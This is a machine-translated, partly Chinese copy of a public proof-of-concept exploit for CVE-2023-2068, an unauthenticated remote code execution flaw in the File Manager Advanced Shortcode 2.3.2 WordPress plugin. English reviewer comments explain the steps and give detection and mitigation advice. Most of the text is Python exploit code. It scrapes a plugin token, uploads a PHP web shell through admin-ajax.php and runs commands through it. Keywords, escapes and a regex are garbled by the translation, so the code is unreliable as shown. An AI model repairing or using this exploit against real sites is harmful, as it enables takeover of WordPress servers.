
File Manager Advanced Shortcode 2.3.2 - 未经身份验证的远程代码执行(RCE)

#利用标题: File Manager Advanced Shortcode 2.3.2 - 未经身份验证的远程代码执行(RCE)
#date: 05/31/2023
#利用作者: Mateus Machado Tesser
#供应商主页: https://advancedfilemanager.com/
#版本: File Manager Advanced Shortcode 2.3.2
#测试环境: WordPress 6.1 / Linux (Ubuntu) 5.15
#CVE: CVE-2023-2068
# NOTE(review): this listing is a machine translation of a public PoC for the
# CVE-2023-2068 advisory in the header above (File Manager Advanced Shortcode 2.3.2).
# The translation mangled keywords, identifiers and escapes ("导入" for import,
# "打印" for print, "\ 033" for "\033", the module name after the last import and
# the comparison operator on the argv length check are lost), so the text is not
# runnable as shown and is kept verbatim for reference only.
#
# What the script does, according to its own status messages and requests:
#   1. reads a target host (argv[1]) and a command (argv[2]);
#   2. fetches the site root and extracts the plugin's `_fmakey` token from the page;
#   3. POSTs a multipart body to /wp-admin/admin-ajax.php with
#      action=fma_load_shortcode_fma_ui and cmd=upload, carrying an `upload[]` file
#      part named exploit2.php that contains a PHP system() stub -- no credentials
#      are sent, which is the "unauthenticated" part of the advisory;
#   4. takes the `url` of the `added` entry in the JSON reply and requests it with
#      a `cmd` query parameter.
#
# Defender notes:
#   - Detection: POSTs to admin-ajax.php with action=fma_load_shortcode_fma_ui and
#     cmd=upload from unauthenticated sessions, especially with a .php file part;
#     new .php files appearing under the path the file manager serves; follow-up
#     GETs to such files with a `cmd` query string. The hard-coded User-Agent on
#     the request header line below is also a usable (if weak) indicator.
#   - Mitigation: upgrade the plugin to a release that fixes CVE-2023-2068, and do
#     not let the file manager's upload action be reached without authentication.
导入请求
进口JSON
导入pprint
导入系统
导入
process='\ 033 [1; 34; 40m [*] \ 033 [0m'
成功='\ 033 [1; 32; 40m [+] \ 033 [0m'
fail='\ 033 [1; 31; 40m [ - ] \ 033 [0m'
TRY:
命令=sys.argv [2]
ip=sys.argv [1]
如果Len(命令)1:
经过
如果IP:
经过
其他:
打印(f'use: {sys.argv [0]} ip命令')
Except:
经过
# Step 2: the token is scraped from the site root; the regex on the findall line
# below was truncated by the translation.
url='http://'+ip+'/'#文件经理的路径高级短代码面板
打印(f'{process}搜索fmakey')
TRY:
r=requests.get(url)
raw_fmakey=r.text
fmakey=re.findall('_ fmakey。
如果len(fmakey)==0:
print(f'{fail}找不到fmakey!')
Except:
print(f'{fail}找不到fmakey!')
# Step 3: hand-built multipart body (boundary "webkitformboundaryii52dgcot37rixrs1")
# sent to admin-ajax.php. The "\ r \ n" sequences are translation residue of "\r\n".
打印(f'{process}通过Ajax利用未经验证的远程代码执行!')
url='http://'+ip+'/wp-admin/admin-ajax.php'
标题={'user-agent':'Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebKit/537.36(Khtml,例如Gecko)chrome/104.0.5112.102 boundard=----- webkitformboundaryii52dgcot37rixrs1','accept':'/'}
data='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'reqid \'\ r \ n \ r \ n \ n \ r \ n \ n \ r \ n \ n \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'cmd \'\ r \ n \ r \ n \ n \ n \ nupload \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'target \'\ r \ n \ r \ n \ n \ nl1_lw \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'哈希[L1_CG5NLWNSAXBHCNQTAGFJA2VYLWHHY2TLCI5WBMC] \'\ r \ n \ n \ r \ n \ n \ n \ n \ n \ n \ n \ n \ nexploit.php \ php \ r \ r \ r \ r \ r \ n''''
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'action \'\ r \ n \ r \ n \ n \ nfma_load_shortcode_fma_ui \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'_ fmakey \'\ r \ n \ r \ n'+fmakey+'\ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'路径\'\ r \ n \ r \ n \ n \ r \ n \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'url \'\ r \ n \ r \ n \ n \ r \ n \ r \ r \ n \ n \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'w \'\ r \ n \ r \ n \ n \ n \ nfalse \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'r \'\ r \ n \ r \ n \ n \ r \ ntrue \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'hide \'\ r \ n \ r \ n \ r \ nplugins \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'操作\'\ r \ n \ r \ n \ n \ nupload,下载\ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'path_type \'\ r \ n \ r \ n \ n \ n \ nininside \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'hide_path \'\ r \ n \ r \ n \ n \ nno \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'enable_trash \'\ r \ n \ r \ n \ n \ n \ r \ nno \ r \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'upload_allow \'\ r \ n \ r \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'
# The file part below is what a WAF / upload filter should reject: a .php filename
# with content-type text/x-php on an unauthenticated request.
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'upload [] \'; filename=\'exploit2.php \'\ r \ ncontent-type: text/x-php \ r \ n \ n \ r \ r \ n \ n \ r \ r \ n \ n?php system($ _ get ['cmd'])
data +='----- webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'mtime [] \'\ r \ n \ r \ n \ n \ r \ n \ n \ r \ n -------------------------------------------------------------------------------------------------
r=requests.post(url,标头=标题,data=data)
print(f'{process}将ajax请求发送给: {url}')
# Outcome check: the script treats an "errUploadMime" marker or an HTML (non-JSON)
# reply as failure, and only a JSON reply as success.
如果R.Text:中的“ eruploadmime”
打印(f'{fail}利用失败!')
sys.exit()
Elif R.Headers ['content-type']。startswith('text/html'):
打印(f'{fail}利用失败!尝试更改_fmakey')
sys.exit(0)
其他:
打印(f'{success}利用成功执行!')
# Step 4: the JSON reply's `added` list carries the URL of the stored file, which
# is then fetched with the command in the query string.
剥削=json.loads(r.text)
url=''
打印(f'{process}使用webshell获取URL')
因为我在剥削['添加'] :
url=i ['url']
print(f'{process}执行'{command}'')
r=requests.get(url+'?cmd='+命令)
print(f'{Success}应用程序返回({len(r.text)}长度): \ n'+r.text)
 